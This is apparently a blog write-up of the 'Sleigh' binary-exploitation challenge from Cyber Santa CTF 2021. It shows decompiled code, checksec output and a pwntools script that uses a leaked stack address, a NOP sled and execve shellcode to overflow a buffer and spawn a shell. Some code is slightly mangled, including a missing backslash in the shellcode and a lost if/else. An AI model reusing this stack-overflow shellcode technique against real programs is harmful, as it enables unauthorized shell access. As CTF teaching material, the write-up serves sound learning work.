Skip to main content

Day 2: Sleigh

challenge description
The Elves have messed up with Santa's sleigh! Without it, he will not be able to deliver any gifts!! 
Help him repair it and save the holidays!

Delivering Gifts

We start off by looking at the binary decompiled using Ghidra.

Before that, when running the binary, we see the usual blinking colours and a prompt to repair the Sleigh.

They are kind enough to provide us with some location. (As we see, it is on the stack).

void repair(void)

undefined8 local_48;
undefined8 local_40;
undefined8 local_38;
undefined8 local_30;
undefined8 local_28;
undefined8 local_20;
undefined8 local_18;
undefined8 local_10;

local_48 = 0;
local_40 = 0;
local_38 = 0;
local_30 = 0;
local_28 = 0;
local_20 = 0;
local_18 = 0;
local_10 = 0;
fprintf(stdout,"%s\n[!] There is something written underneath the sleigh: [%p]\n\n",&DAT_00100c98,
fprintf(stdout,"%s[*] This might help the repair team to fix it. What shall they do?\n> ",

Ahh! Another stack buffer overflow with write-what-where. Checking the permissions using checksec:

~/Desktop/CTF/CyberSantaCTF2021/pwn/pwnSleigh ❯ checksec sleigh
[*] '/home/wonyk/Desktop/CTF/CyberSantaCTF2021/pwn/pwnSleigh/sleigh'
Arch: amd64-64-little
Stack: No canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments

We are in luck. Read-write and execute with NX disabled? Sounds perfect for shellcode! We can craft some shellcode and use the stack pointer location to redirect to it to spawn a shell, of couse needing some nop slides, if not it is not a sleigh!

from pwn import *

context.log_level = 'error'
binary = context.binary = ELF("./sleigh")

if args.REMOTE:
p = remote('',30302)
p = process("./sleigh")

p.sendlineafter(b">", b'1')
p.recvuntil(b"sleigh: [")
leaked_stack = int(p.recvline()[:-2], 16)

print("[+] Leaked Hex:", hex(leaked_stack))

shellcode = b"x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
payload = b'\x90' * 10
payload += shellcode
payload += b'A' * (72 - len(payload))
payload += p64(leaked_stack)

p.sendlineafter(b">", payload)